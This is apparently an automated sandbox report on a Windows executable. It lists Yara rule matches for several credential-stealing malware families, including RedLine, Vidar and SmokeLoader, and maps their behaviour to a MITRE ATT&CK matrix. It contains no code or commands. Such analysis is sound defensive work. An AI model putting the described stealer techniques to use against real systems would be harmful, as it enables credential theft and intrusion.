Source: Yara match	File source: 13.2.b7b5e2e140.exe.a7c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.4dfe6dfd76.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.d755f09e83.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a70a000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a770000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.xkV9ZML.exe.3919550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cbf2b6294a.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.4dfe6dfd76.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.b4fe2af6b4.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3110324959.000000000A770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2751476788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2793676749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3109758340.000000000A70A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3110324959.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3068524352.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3118521479.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3400586669.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3257227799.0000000000D61000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2748577375.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3068524352.000000000A770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2875221579.0000000000521000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: xkV9ZML.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4dfe6dfd76.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b4fe2af6b4.exe PID: 3608, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.4dfe6dfd76.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ViGgA8C.exe PID: 6044, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bjkm5hE.exe PID: 5468, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	244 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	51 Obfuscated Files or Information	Security Account Manager	971 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	33 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	471 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	2 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1w5RpHuliE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
1w5RpHuliE.exe